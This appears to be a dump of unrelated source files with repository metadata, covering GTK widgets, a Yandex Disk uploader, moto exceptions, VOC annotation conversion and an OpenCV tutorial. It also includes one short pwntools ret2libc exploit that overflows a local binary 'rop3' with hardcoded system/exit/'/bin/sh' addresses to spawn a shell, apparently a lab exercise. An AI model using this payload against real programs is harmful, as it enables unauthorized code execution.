self.gtk = []
self.widgets = []
self.whoclass = None
if self.scope:
self.scope.removeWidget(self)
self.scope = None
def newWhoCB(self, whoname): # switchboard ("new who", classname)
self.buildWidgets()
def renameWhoCB(self, oldpath, newname): # sb ("rename who", classname)
# The object being renamed might be an internal node, in which
# case the path being passed in will be shorter than required
# for setting the state of this widget.
opath = labeltree.makePath(oldpath) # old path to renamed object
npath = opath[:-1] + [newname] # new path to renamed object
cpath = self.currentPath # current path
if opath == cpath[:len(opath)]: # path to current object is changing
npath += cpath[len(opath):] # new path to current object
self.buildWidgets(npath)
else: # change does not affect current object
self.buildWidgets()
def selectCB(self, gtkobj, name, d): # ChooserWidget callback
newpath = self.currentPath[:]
newpath[d] = name
self.buildWidgets(newpath, interactive=1) # sets currentPath
if self.callback:
self.callback(self.currentPath)
def comboCB(self, widget): # ChooserComboWidget callback
# Since the ChooserComboWidget represents a leaf of the
# WhoClass heirarchy, there's no need to rebuild the other
# widgets. We just have to tell the world that the value has
# changed.
switchboard.notify(self, interactive=1)
def set_value(self, value):
path = labeltree.makePath(value)
self.buildWidgets(path)
class WhoWidget(WhoWidgetBase):
def __init__(self, whoclass, value=None, callback=None, scope=None,
name=None,
condition=whoville.excludeProxies,
sort=whoville.proxiesLast,
verbose=False):
WhoWidgetBase.__init__(self, whoclass, value, callback, scope,
condition, sort, widgettype='Chooser',
verbose=verbose)
def get_value(self, depth=None):
if depth is None:
depth = len(self.currentPath)
# In proxy case, ignore depth.
if self.currentPath[0] in self.proxy_names:
return self.currentPath[0]
if '' in self.currentPath[:depth]:
return None
return string.join(self.currentPath[:depth], ':')
def isValid(self):
if self.currentPath[0] in self.proxy_names:
return True
return '' not in self.currentPath
# The NewWhoWidget is used in the NewWhoParameterWidget, and
# substitutes a ChooserCombo for the Chooser at the lowest level of
# the WhoClass hierarchy. This allows the user to type in the name of
# a new Who object, instead of simply choosing between existing ones.
# The ChooserCombo doesn't support any callbacks, so the NewWhoWidget
# doesn't either. This makes it appropriate for use only in passive
# situations. It can't initiate any action on its own.
class NewWhoWidget(WhoWidgetBase):
def __init__(self, whoclass, value=None, callback=None, scope=None,
name=None,
condition=whoville.excludeProxies,
sort=whoville.proxiesLast,
verbose=False):
WhoWidgetBase.__init__(self, whoclass, value, callback, scope,
condition, sort, widgettype='Combo',
verbose=verbose)
def get_value(self):
# This is slightly nontrivial because the ChooserCombo doesn't
# have a callback, so the last part of self.currentPath isn't
# automatically updated.
debug.mainthreadTest()
if self.widgets and self.widgets[-1]:
self.currentPath[-1] = self.widgets[-1].get_value()
return string.join(self.currentPath, ':')
def isValid(self):
debug.mainthreadTest()
if self.widgets and self.widgets[-1]:
return self.widgets[-1].get_value()
###################################
# The WhoParameterWidget assembles the components of a WhoWidget into
# a table so that the WhoWidget can be placed in automatically
# generated GUI objects (eg, RegisteredClassFactories). It is a
# WidgetScope and as such contains its WhoWidget, so that other
# widgets searching for the WhoWidget can find it. Other widgets
# should never have to search for the WhoParameterWidget explicitly.
class WhoParameterWidgetBase(parameterwidgets.ParameterWidget,
widgetscope.WidgetScope):
def __init__(self, whoclass, value=None, scope=None, name=None, sort=None,
condition=whoville.excludeProxies, verbose=False):
debug.mainthreadTest()
widgetscope.WidgetScope.__init__(self, scope)
self.whowidget = self.makeSubWidgets(whoclass, value, condition, sort,
verbose=verbose)
# Put the WhoWidget's components into a box.
depth = len(self.whowidget.gtk)
frame = gtk.Frame()
frame.set_shadow_type(gtk.SHADOW_IN)
vbox = gtk.VBox()
frame.add(vbox)
parameterwidgets.ParameterWidget.__init__(self, frame, scope, name,
verbose=verbose)
for d in range(depth):
vbox.pack_start(self.whowidget.gtk[d], expand=0, fill=0)
self.wwcallback = switchboard.requestCallbackMain(self.whowidget,
self.widgetCB)
self.widgetCB(0)
def set_value(self, value):
self.whowidget.set_value(value)
def get_value(self):
return self.whowidget.get_value()
def cleanUp(self):
parameterwidgets.ParameterWidget.cleanUp(self)
self.destroyScope()
switchboard.removeCallback(self.wwcallback)
def widgetCB(self, interactive): # validity check
val = self.get_value()
self.widgetChanged(val and val[-1] != ':', interactive)
class WhoParameterWidget(WhoParameterWidgetBase):
def makeSubWidgets(self, whoclass, value, condition, sort, verbose=False):
return WhoWidget(whoclass, value, scope=self, condition=condition,
sort=sort, verbose=verbose)
class NewWhoParameterWidget(WhoParameterWidgetBase):
def makeSubWidgets(self, whoclass, value, condition, sort, verbose=False):
return NewWhoWidget(whoclass, value, scope=self, condition=condition,
sort=sort, verbose=verbose)
def _WhoParameter_makeWidget(self, scope=None, verbose=False):
return WhoParameterWidget(self.whoclass, self.value, scope=scope,
name=self.name, verbose=verbose)
whoville.WhoParameter.makeWidget = _WhoParameter_makeWidget
def _NewWhoParameter_makeWidget(self, scope=None, verbose=False):
return NewWhoParameterWidget(self.whoclass, self.value, scope=scope,
name=self.name, verbose=verbose)
whoville.NewWhoParameter.makeWidget = _NewWhoParameter_makeWidget
###############################################
class WhoClassParameterWidget(parameterwidgets.ParameterWidget):
def __init__(self, value, scope=None, name=None,
condition=whoville.noSecretClasses,
verbose=False):
self.chooser = chooser.ChooserWidget(whoville.classNames(condition),
callback=self.chooserCB,
name=name)
parameterwidgets.ParameterWidget.__init__(self, self.chooser.gtk, scope,
verbose=verbose)
self.sb = switchboard.requestCallbackMain('new who class',
self.newWhoClass)
self.set_value(value)
self.condition = condition
def newWhoClass(self, classname):
self.chooser.update(whoville.classNames(self.condition))
def chooserCB(self, gtkobj, name):
switchboard.notify(self, interactive=1)
self.widgetChanged(self.get_value() is not None, interactive=1)
def set_value(self, value):
self.chooser.set_state(value) # does not call chooserCB
switchboard.notify(self, interactive=0)
# Use self.get_value(), not value, to check validity, because
# value may be None, in which case the actual value is
# whatever's first in the Chooser.
self.widgetChanged(self.get_value() is not None, interactive=0)
def get_value(self):
return self.chooser.get_value()
def cleanUp(self):
switchboard.removeCallback(self.sb)
parameterwidgets.ParameterWidget.cleanUp(self)
def _WhoClassParameter_makeWidget(self, scope=None, verbose=False):
return WhoClassParameterWidget(self.value, scope=scope, name=self.name,
condition=self.condition,
verbose=verbose)
whoville.WhoClassParameter.makeWidget = _WhoClassParameter_makeWidget
###############################################
class AnyWhoParameterWidget(parameterwidgets.ParameterWidget,
widgetscope.WidgetScope):
# See comment in WhoParameterWidget about WidgetScope.
def __init__(self, value, scope, name=None, verbose=False):
widgetscope.WidgetScope.__init__(self, scope)
parameterwidgets.ParameterWidget.__init__(self, gtk.VBox(), scope, name,
verbose=verbose)
self.classwidget = scope.findWidget(
lambda w: isinstance(w, WhoClassParameterWidget))
self.whopwidget = None # enclosed WhoParameterWidget
self.whoclassname = None
self.whoSignal = None
self.buildWidget()
self.set_value(value)
self.classSignal = switchboard.requestCallbackMain(
self.classwidget, self.classChangedCB)
def cleanUp(self):
parameterwidgets.ParameterWidget.cleanUp(self)
switchboard.removeCallback(self.classSignal)
if self.whoSignal:
switchboard.removeCallback(self.whoSignal)
def classChangedCB(self, *args, **kwargs):
if self.classwidget.get_value() != self.whoclassname:
self.buildWidget()
def buildWidget(self):
debug.mainthreadTest()
if self.whopwidget:
self.whopwidget.destroy()
self.whoclassname = self.classwidget.get_value()
whoclass = whoville.getClass(self.whoclassname)
# Create a WhoWidget that doesn't exclude proxy who
# objects. If it's necessary to create an
# AnyWhoParameterWidget with a different exclusion policy,
# then the AnyWhoParameter will need to have a 'condition'
# attribute that can be passed in to the widget.
self.whopwidget = WhoParameterWidget(whoclass, scope=self,
sort=whoville.proxiesLast,
condition=lambda x:1)
if self.whoSignal:
switchboard.removeCallback(self.whoSignal)
self.whoSignal = switchboard.requestCallbackMain(self.whopwidget,
self.whoChangedCB)
self.gtk.pack_start(self.whopwidget.gtk)
self.gtk.show_all()
self.widgetChanged(self.get_value() is not None, interactive=0)
def whoChangedCB(self, *args):
self.widgetChanged(self.get_value() is not None, interactive=1)
def set_value(self, value):
self.whopwidget.set_value(value)
# Use self.get_value(), not value, to check validity, because
# value may be None, in which case the actual value is
# whatever's first in the Chooser.
self.widgetChanged(self.get_value() is not None, interactive=0)
def get_value(self):
return self.whopwidget.get_value()
def _AnyWhoParameter_makeWidget(self, scope=None, verbose=False):
return AnyWhoParameterWidget(self.value, scope=scope, name=self.name,
verbose=verbose)
whoville.AnyWhoParameter.makeWidget = _AnyWhoParameter_makeWidget
|
[
"faical.congo@nist.gov"
] |
faical.congo@nist.gov
|
9d0e351bfa38fc82b31382b48b8115881e12eb82
|
eecd638aed3e5952d158c6f080f2aa9bc772ca7e
|
/YaDisk.py
|
9635f8950042620cbad69d08910c0b0040f31c08
|
[] |
no_license
|
OksanaSha/coursework_october
|
0d6a3b488b746c9e5f3816e1a54f3740cc004d81
|
fb2de7206d7db40d7d405b97d28dca2a881faf05
|
refs/heads/master
| 2023-08-21T19:08:59.923239
| 2021-10-22T18:21:53
| 2021-10-22T18:27:30
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,208
|
py
|
import requests
class YaDisk:
def __init__(self, token):
self.token = token
def get_headers(self):
return {
'Content-Type': 'application/json',
'Authorization': f'OAuth {self.token}'
}
def upload_file(self, file_url, name_dir, file_name):
upload_url = 'https://cloud-api.yandex.net/v1/disk/resources/upload'
path = f'{name_dir}/{file_name}.jpg'
params = {'url': file_url, 'path': path}
headers = self.get_headers()
response = requests.post(url=upload_url, headers=headers, params=params)
if response.status_code != 202:
print(response.status_code)
def create_dir(self, name_dir):
url = 'https://cloud-api.yandex.net/v1/disk/resources'
params = {'path': name_dir}
headers = self.get_headers()
response = requests.put(url=url, headers=headers, params=params)
if response.status_code == 201:
print(f'Папка "{name_dir}" создана на Я.Диске')
elif response.status_code == 409:
print(f'Папка "{name_dir}" уже существует')
else:
print(response.status_code)
|
[
"oksanashatalova@bk.ru"
] |
oksanashatalova@bk.ru
|
a509f4e8e220d22d6a23906514d73f383eb93a0b
|
4ef688b93866285bcc27e36add76dc8d4a968387
|
/moto/route53resolver/exceptions.py
|
e0ce342b448e1b445409540ec36f23c090c5211f
|
[
"Apache-2.0"
] |
permissive
|
localstack/moto
|
cec77352df216cac99d5e0a82d7ada933950a0e6
|
b0b2947e98e05d913d7ee2a0379c1bec73f7d0ff
|
refs/heads/localstack
| 2023-09-01T05:18:16.680470
| 2023-07-10T09:00:26
| 2023-08-07T14:10:06
| 118,838,444
| 22
| 42
|
Apache-2.0
| 2023-09-07T02:07:17
| 2018-01-25T00:10:03
|
Python
|
UTF-8
|
Python
| false
| false
| 2,366
|
py
|
from typing import List, Tuple
from moto.core.exceptions import JsonRESTError
class RRValidationException(JsonRESTError):
code = 400
def __init__(self, error_tuples: List[Tuple[str, str, str]]):
"""Validation errors are concatenated into one exception message.
error_tuples is a list of tuples. Each tuple contains:
- name of invalid parameter,
- value of invalid parameter,
- string describing the constraints for that parameter.
"""
msg_leader = (
f"{len(error_tuples)} "
f"validation error{'s' if len(error_tuples) > 1 else ''} detected: "
)
msgs = []
for arg_name, arg_value, constraint in error_tuples:
msgs.append(
f"Value '{arg_value}' at '{arg_name}' failed to satisfy "
f"constraint: Member must {constraint}"
)
super().__init__("ValidationException", msg_leader + "; ".join(msgs))
class InvalidNextTokenException(JsonRESTError):
code = 400
def __init__(self) -> None:
super().__init__(
"InvalidNextTokenException",
"Invalid value passed for the NextToken parameter",
)
class InvalidParameterException(JsonRESTError):
code = 400
def __init__(self, message: str):
super().__init__("InvalidParameterException", message)
class InvalidRequestException(JsonRESTError):
code = 400
def __init__(self, message: str):
super().__init__("InvalidRequestException", message)
class LimitExceededException(JsonRESTError):
code = 400
def __init__(self, message: str):
super().__init__("LimitExceededException", message)
class ResourceExistsException(JsonRESTError):
code = 400
def __init__(self, message: str):
super().__init__("ResourceExistsException", message)
class ResourceInUseException(JsonRESTError):
code = 400
def __init__(self, message: str):
super().__init__("ResourceInUseException", message)
class ResourceNotFoundException(JsonRESTError):
code = 400
def __init__(self, message: str):
super().__init__("ResourceNotFoundException", message)
class TagValidationException(JsonRESTError):
code = 400
def __init__(self, message: str):
super().__init__("ValidationException", message)
|
[
"noreply@github.com"
] |
localstack.noreply@github.com
|
46a7f1350601ecdbc3531d9b011717dc8aced37f
|
b1fe0349febf70932f95cae5ed3f0d8768be992f
|
/voc_annotation.py
|
2ef424d5a38cc8c57ec752296db0f1a1433da4a0
|
[
"MIT"
] |
permissive
|
Snaill123/Crack-Detection-YOLOV3
|
537d24fa477d05b4b9b00702d522bf4365399760
|
694bcd2a1802d0e1ed9504b4a2429af84069af5a
|
refs/heads/master
| 2020-05-16T16:16:25.535414
| 2018-12-16T07:02:54
| 2018-12-16T07:02:54
| 183,156,921
| 5
| 0
| null | 2019-04-24T05:49:37
| 2019-04-24T05:49:36
| null |
UTF-8
|
Python
| false
| false
| 3,527
|
py
|
import os
import xml.etree.ElementTree as ET
from tqdm import tqdm
from os import getcwd
sets=[('2007', 'train')]
classes = ["neg"]
def _write_data():
xmlfilepath = 'DATA/VOC2007/Annotations'
txtsavepath = 'DATA/VOC2007/ImageSets/Main'
all_images = [i.split('.')[0] for i in os.listdir(xmlfilepath)]
with open(os.path.join(txtsavepath, 'train.txt'), 'w') as train_f:
for i in all_images:
train_f.write(str(i)+'\n')
def _write_amend_data():
xmlfilepath = 'DATA/Amend_VOC2007/Annotations'
txtsavepath = 'DATA/Amend_VOC2007/ImageSets/Main'
all_images = [i.split('.')[0] for i in os.listdir(xmlfilepath)]
with open(os.path.join(txtsavepath, 'train.txt'), 'w') as train_f:
for i in all_images:
train_f.write(str(i) + '\n')
def _convert_annotation(year, image_id, list_file):
in_file = open('DATA/VOC%s/Annotations/%s.xml'%(year, image_id))
tree=ET.parse(in_file)
root = tree.getroot()
for obj in root.iter('object'):
difficult = obj.find('difficult').text
cls = obj.find('name').text
if cls not in classes or int(difficult)==1:
continue
cls_id = classes.index(cls)
xmlbox = obj.find('bndbox')
b = (int(xmlbox.find('xmin').text), int(xmlbox.find('ymin').text), int(xmlbox.find('xmax').text), int(xmlbox.find('ymax').text))
list_file.write(" " + ",".join([str(a) for a in b]) + ',' + str(cls_id))
def _convert_amend_annotation(year, image_id, list_file):
in_file = open('DATA/Amend_VOC%s/Annotations/%s.xml' % (year, image_id))
tree = ET.parse(in_file)
root = tree.getroot()
for obj in root.iter('object'):
difficult = obj.find('difficult').text
cls = obj.find('name').text
if cls not in classes or int(difficult) == 1:
continue
cls_id = classes.index(cls)
xmlbox = obj.find('bndbox')
b = (int(xmlbox.find('xmin').text), int(xmlbox.find('ymin').text), int(xmlbox.find('xmax').text),
int(xmlbox.find('ymax').text))
list_file.write(" " + ",".join([str(a) for a in b]) + ',' + str(cls_id))
def trainsform_data(usage='train'):
wd = getcwd()
if usage == 'train':
_write_data()
for year, image_set in sets:
image_ids = open('DATA/VOC%s/ImageSets/Main/%s.txt' % (year, image_set)).read().strip().split()
list_file = open(os.path.join('model_data', '%s_%s.txt' % (year, image_set)), 'w')
for image_id in tqdm(image_ids, desc="开始转换数据集[%s]" % usage):
list_file.write('%s/DATA/VOC%s/JPEGImages/%s.jpg' % (wd, year, image_id))
_convert_annotation(year, image_id, list_file)
list_file.write('\n')
list_file.close()
elif usage == 'amend':
_write_amend_data()
for year, image_set in sets:
image_ids = open('DATA/Amend_VOC%s/ImageSets/Main/%s.txt' % (year, image_set)).read().strip().split()
list_file = open(os.path.join('model_data', '%s_%s.txt' % (year, image_set)), 'w')
for image_id in tqdm(image_ids, desc="开始转换数据集[%s]" % usage):
list_file.write('%s/DATA/Amend_VOC%s/JPEGImages/%s.jpg' % (wd, year, image_id))
_convert_amend_annotation(year, image_id, list_file)
list_file.write('\n')
list_file.close()
else:
raise print("请输入正确数据集用途")
if __name__ == '__main__':
trainsform_data()
|
[
"1011836423@qq.com"
] |
1011836423@qq.com
|
40b4345a29324b82ea57abfae90c4db05b805c43
|
95db37486077442a6e3b368d3cc76674cfd2ff53
|
/opencv-tutorial/opencv_tutorial_01.py
|
2e37e31e0127ba44bf4c869e30c43dd35383f8ee
|
[] |
no_license
|
freebreadstix/computer_vision
|
971692da3dd23b6191d63bc10fe977a4619d2783
|
eadb931d4323c480331f6612514767ddc62a5149
|
refs/heads/master
| 2022-12-05T19:44:12.018234
| 2020-08-29T03:54:28
| 2020-08-29T03:54:28
| 287,652,030
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,478
|
py
|
# USAGE
# python opencv_tutorial_01.py
# import the necessary packages
import imutils
import cv2
# load the input image and show its dimensions, keeping in mind that
# images are represented as a multi-dimensional NumPy array with
# shape no. rows (height) x no. columns (width) x no. channels (depth)
image = cv2.imread("jp.png")
(h, w, d) = image.shape
print("width={}, height={}, depth={}".format(w, h, d))
# display the image to our screen -- we will need to click the window
# open by OpenCV and press a key on our keyboard to continue execution
# output = image.copy()
# cv2.imshow("Image", output)
# cv2.waitKey(0)
# access the RGB pixel located at x=50, y=100, keepind in mind that
# OpenCV stores images in BGR order rather than RGB
# (B, G, R) = image[100, 50]
# print("R={}, G={}, B={}".format(R, G, B))
# # extract a 100x100 pixel square ROI (Region of Interest) from the
# # input image starting at x=320,y=60 at ending at x=420,y=160
# roi = image[60:160, 320:420].copy()
# cv2.imshow("ROI", roi)
# cv2.waitKey(0)
# # resize the image to 200x200px, ignoring aspect ratio
# resized = cv2.resize(image, (20000, 20000))
# cv2.imshow("Fixed Resizing", resized)
# cv2.waitKey(0)
# # fixed resizing and distort aspect ratio so let's resize the width
# # to be 300px but compute the new height based on the aspect ratio
r = 300.0 / w
dim = (300, int(h * r))
resized = cv2.resize(image.copy(), dim)
cv2.imwrite("output.png", resized)
# # manually computing the aspect ratio can be a pain so let's use the
# # imutils library instead
# resized = imutils.resize(image, width=300)
# cv2.imshow("Imutils Resize", resized)
# cv2.waitKey(0)
# # let's rotate an image 45 degrees clockwise using OpenCV by first
# # computing the image center, then constructing the rotation matrix,
# # and then finally applying the affine warp
# center = (w // 2, h // 2)
# M = cv2.getRotationMatrix2D(center, -45, 1.0)
# rotated = cv2.warpAffine(image, M, (w, h))
# cv2.imshow("OpenCV Rotation", rotated)
# cv2.waitKey(0)
# # rotation can also be easily accomplished via imutils with less code
# rotated = imutils.rotate(image, -45)
# cv2.imshow("Imutils Rotation", rotated)
# cv2.waitKey(0)
# # OpenCV doesn't "care" if our rotated image is clipped after rotation
# # so we can instead use another imutils convenience function to help
# # us out
# rotated = imutils.rotate_bound(image, 45)
# cv2.imshow("Imutils Bound Rotation", rotated)
# cv2.waitKey(0)
# # apply a Gaussian blur with a 11x11 kernel to the image to smooth it,
# # useful when reducing high frequency noise
# blurred = cv2.GaussianBlur(image, (11, 11), 0)
# cv2.imshow("Blurred", blurred)
# cv2.waitKey(0)
# # draw a 2px thick red rectangle surrounding the face
# output = image.copy()
# cv2.rectangle(output, (320, 60), (420, 160), (0, 0, 255), 2)
# cv2.imshow("Rectangle", output)
# cv2.waitKey(0)
# # draw a blue 20px (filled in) circle on the image centered at
# # x=300,y=150
# output = image.copy()
# cv2.circle(output, (300, 150), 20, (255, 0, 0), -1)
# cv2.imshow("Circle", output)
# cv2.waitKey(0)
# # draw a 5px thick red line from x=60,y=20 to x=400,y=200
# output = image.copy()
# cv2.line(output, (60, 20), (400, 200), (0, 0, 255), 5)
# cv2.imshow("Line", output)
# cv2.waitKey(0)
# # draw green text on the image
# output = image.copy()
# cv2.putText(output, "OpenCV + Jurassic Park!!!", (10, 25),
# cv2.FONT_HERSHEY_SIMPLEX, 0.7, (0, 255, 0), 2)
# cv2.imshow("Text", output)
# cv2.waitKey(0)
|
[
"Lucas Nguyen"
] |
Lucas Nguyen
|
280a0f56dab449cf30e0d252cc2e58c11e89bc4c
|
070b83742b2b1dad16dbcfa0c9b234d50f32c1a0
|
/scripts/html-list.py
|
96a340cee91579c6b4bd51e7b94678e03a18f293
|
[] |
no_license
|
venkyms/python-workspace
|
f4edc2a39ac95c5b8ece2e12e2ce02b6065017dd
|
5fa9fc8749ae80a68354b416afa24c6a4063d4f8
|
refs/heads/master
| 2021-09-13T09:13:33.214578
| 2018-04-27T16:11:38
| 2018-04-27T16:14:08
| 125,087,832
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 418
|
py
|
def html_list(data_list):
"""
Generate html document list from input string list
:param data_list: string which needs to be converted as html list
:return: html document string
"""
html_doc = ['<ul>']
for data in data_list:
html_doc.append('<li>' + data + '</li>')
html_doc.append('</ul>')
return "\n".join(html_doc)
print(html_list(['first string', 'second string']))
|
[
"venkyms@gmail.com"
] |
venkyms@gmail.com
|
d52c60bea48572304a0adfeceeae75ba986c6e31
|
4dab2427e86b7efc2f6e3e43959c923b6ba89d75
|
/main.py
|
b6b24370d019b2100927cce803021209b1fa256f
|
[] |
no_license
|
bmahlbrand/personal_tweets
|
47cf0c7b079eb4ac45c04d01c0be99c6f99bfe1e
|
20c112d5783b822f6a9a8b6123841ecca9763a63
|
refs/heads/master
| 2021-05-04T11:06:55.717197
| 2016-10-27T22:57:24
| 2016-10-27T22:57:24
| 50,936,472
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 162
|
py
|
__author__ = 'Ben'
if __name__ == '__main__':
t1 = ("a", "b")
t2 = ("a", "b")
if t1 == t2:
print('success')
else:
print('fail')
|
[
"bmahlbrand@gmail.com"
] |
bmahlbrand@gmail.com
|
efb80819e06b36adbd316faa062924a416122433
|
08302090dafd6c5988374213f224f9116a8224fb
|
/rop/exploit_rop_no_aslr.py
|
70fff54aa5900c89fce4a4c2ca64404c3152328d
|
[] |
no_license
|
violentr/exploit_development
|
da813c9c38b6708e7db3f05f4ed625b2e7e1b208
|
8fdeec71301b64e77fc869649a798d52947b2ff3
|
refs/heads/master
| 2021-07-17T07:44:14.431004
| 2020-10-20T20:56:42
| 2020-10-20T20:56:42
| 219,014,772
| 4
| 4
| null | 2020-10-20T20:56:43
| 2019-11-01T15:42:24
|
Assembly
|
UTF-8
|
Python
| false
| false
| 292
|
py
|
#!/usr/bin/env python
from pwn import *
leak = "A"*140
#return address system
leak += "\xa0\x4d\xe5\xb7"
#return address exit
leak += "\xd0\x89\xe4\xb7"
#return address "bin/sh"
leak += "\x0b\x5a\xf7\xb7"
exploit = process("./rop3", shell=True)
exploit.sendline(leak)
exploit.interactive()
|
[
"den.b@itservicesgroup.co.uk"
] |
den.b@itservicesgroup.co.uk
|
2c6e40eec956f0a7689c6933a20e8815bf9bcad6
|
ad8395ea7c00873329fe0e0e0d115a7e51e02636
|
/transversingTwoDList.py
|
34d74aaf8fcaff52e92bd15530eff4ab1426249e
|
[] |
no_license
|
AErenzo/Python_course_programs
|
0ca7f94e0c6418e1af0c13b6629738f5b5496ee5
|
720d88248e935ad7a77ac0e530ab519882ceea8d
|
refs/heads/master
| 2022-08-23T13:39:09.999602
| 2020-05-19T09:58:33
| 2020-05-19T09:58:33
| 265,209,869
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 237
|
py
|
List = [[0]*3 for i in range(3)]
for i in range(len(List)):
for j in range(len(List[i])):
List[i][j] = int(input('Please enter a Value: '))
for i in List:
for j in i:
print(j, end = ' ')
print()
|
[
"noreply@github.com"
] |
AErenzo.noreply@github.com
|
381a4637bb1abb2acb955e055da64d322ab4defb
|
4e19c788aa10f0102eca2b558eaa8757cf15a419
|
/manage_benefits/urls.py
|
dac0f534ff883f79312fef2621e4e1fc1b08bf17
|
[] |
no_license
|
RohitDigimonk/codedeploy
|
cb3da84e159839337d8699f3737f4fd275b78eac
|
7a4645b3de4c60ea19411055cd6326469549dd14
|
refs/heads/master
| 2022-11-28T17:08:20.505998
| 2020-03-16T07:06:30
| 2020-03-16T07:06:30
| 225,541,914
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 386
|
py
|
from django.urls import path
from . import views
urlpatterns = [
path('', views.index, name='index'),
path('edit/<int:id>', views.edit, name='edit'),
path('remove-benefit/<int:id>', views.remove_benefit, name='remove_benefit'),
path('get-data', views.get_data, name='get_data'),
path('get-data/', views.get_data, name='get_data'),
]
|
[
"gaurav@digimonk.in"
] |
gaurav@digimonk.in
|
daec1712af205795d7261468e5501ddd91e71ccc
|
6003714d0d6da0d8b18a49d577ba6d59725f6a7b
|
/module_Step.py
|
5de4cdb3d21f98e0088def20ef51a10619be4c68
|
[] |
no_license
|
alexInvictus/python-project-on-pc
|
556875c8777af20442bed34fa2f56bdcf6e4ac1f
|
84bd3dd18acfd2e692ccff9e6f987c57d735cdb1
|
refs/heads/master
| 2021-05-06T10:03:12.175320
| 2017-12-13T07:45:43
| 2017-12-13T07:45:43
| 114,090,123
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 522
|
py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# @Date : 2017-12-2 13:28
# @Version : $Id$
# @des : 学习模块章节,用pip安装一个pillow。试运行pillow模块
#pillow模块调用open图像 路径为下面格式
from PIL import Image
#im=Image.open("C:\\Users\\alex\Desktop\\abc.jpg")
#im.show()
#调用matplotlib的一个库来绘制图片进行显示
from PIL import Image
import matplotlib.pyplot as plt
img=Image.open("C:\\Users\\alex\Desktop\\abc.jpg")
plt.figure("dog")
plt.imshow(img)
plt.show()
|
[
"290149382@qq.com"
] |
290149382@qq.com
|
f3a62678fd418f918abd5f71c94c3ee2a6f0671a
|
17584d80491f774bc107a5496a6cdfe536a70e51
|
/src/Data/IntegerData.py
|
aa2e7ac6c6c9066861d4b49b0817cd004fa548c1
|
[] |
no_license
|
rubenvanassche/C-Compiler
|
132f9c6c63afcdfacb54e50ff377d265800c740a
|
42c643a8fc9c392053f53e56c8c453d95a548282
|
refs/heads/master
| 2021-03-24T12:48:51.771282
| 2016-06-10T19:03:29
| 2016-06-10T19:03:29
| 55,611,579
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 328
|
py
|
from src.Data.Data import Data
class IntegerData(Data):
"""Represntatation of integer """
def __init__(self, integer):
super(Data, self).__init__()
self.integer = integer
def compile(self):
return "ldc i " + str(self.integer) + "\n"
def __str__(self):
return str(self.integer)
|
[
"rubenvanassche@gmail.com"
] |
rubenvanassche@gmail.com
|
ad2e63b98db3492c3e23b72e0af9c31eafeeae63
|
f0da00b3e531ac2962d712df1a17607566cd4531
|
/src/device/agilentn5181a.py
|
dfc7c19f0161022478ac242be3bc77cbbe9c2fd9
|
[] |
no_license
|
houssem21/emctestbench
|
98325395ed654b3dfc12e47f7b6112f9529e871a
|
114e9fcfb3630dfa98933221176541331e3863e4
|
refs/heads/master
| 2021-01-15T16:15:48.351445
| 2012-06-29T09:15:58
| 2012-06-29T09:15:58
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,033
|
py
|
from rfgenerator import RfGenerator
from device import ScpiDevice
from utility.quantities import Amplitude,Power,Frequency
class AgilentN5181a(RfGenerator,ScpiDevice):
defaultName = 'Agilent N5181A RF Signal Generator'
visaIdentificationStartsWith = 'Agilent Technologies, N5181A,'
defaultAddress = 'TCPIP0::172.20.1.202::inst0::INSTR'
documentation = {'Programmers Manual':'http://cp.literature.agilent.com/litweb/pdf/N5180-90005.pdf','SCPI Reference':'http://cp.literature.agilent.com/litweb/pdf/N5180-90004.pdf'}
def setWaveform(self,frequency,amplitude):
'''
Set the waveform parameters at once
@param frequency float in Hertz
@param amplitude Amplitude object
'''
self.setFrequency(frequency)
self.write(':SOURce:POWer:LEVel:IMMediate:AMPLitude %e dBm' % amplitude.dBm())
def getOutputEnable(self):
return float(self.ask('OUTPut?'))
def getPower(self):
powerString = self.ask(':SOURce:POWer:LEVel:IMMediate:AMPLitude?')
return Power(float(powerString),'dBm')*self.getOutputEnable()
def setFrequency(self,frequency):
self.write(':SOURce:FREQuency:CW %e Hz' % (frequency.asUnit('Hz')))
def getFrequency(self):
return Frequency(float(self.ask(':SOURce:FREQuency:CW?')),'Hz')
def setPower(self,power):
setPowerString = ':SOURce:POWer:LEVel:IMMediate:AMPLitude {power:e} dBm'.format(power=power.dBm())
self.write(setPowerString)
if power.negligable:
self._enableOutput(False)
else:
self._enableOutput(True)
def _enableOutput(self,enable=True):
if enable:
self.write('OUTPut ON')
else:
self.write('OUTPut OFF')
if __name__ == '__main__':
device = AgilentN5181a()
print device.getFrequency()
# device.setPower(Power(21,'dBm'))
# print device.getPower()
# device.enableOutput(False)
# device.setWaveform(800e6,Amplitude(-25,'dBm'))
|
[
"sjoerd.optland@eseo.fr"
] |
sjoerd.optland@eseo.fr
|
1e52208484d0e919dffe441f55ffecfeedfd9dac
|
97ba5e4f7b5c738dc1217ef2f251f239cd1da173
|
/LidarProcessor/LASView/test/test_LiDAR_Processor_dialog.py
|
b03cbe309754aa68c75732d5e98baec69f71ca28
|
[] |
no_license
|
jsumeet/LiDAR-Plugins
|
d4e5be6958c87735cafc780ed6709df1b36fcba0
|
f3708052d02ef9ba40aedee1d3961389032fa9e3
|
refs/heads/master
| 2020-12-24T21:11:53.830664
| 2016-04-12T07:57:15
| 2016-04-12T07:57:21
| 56,042,612
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,513
|
py
|
# coding=utf-8
"""Dialog test.
.. note:: This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
"""
__author__ = 'tuplecoders@gmail.com'
__date__ = '2015-10-30'
__copyright__ = 'Copyright 2015, tuple coders'
import unittest
from PyQt4.QtGui import QDialogButtonBox, QDialog
from LiDAR_Processor_dialog import LASViewDialog
from utilities import get_qgis_app
QGIS_APP = get_qgis_app()
class LASViewDialogTest(unittest.TestCase):
"""Test dialog works."""
def setUp(self):
"""Runs before each test."""
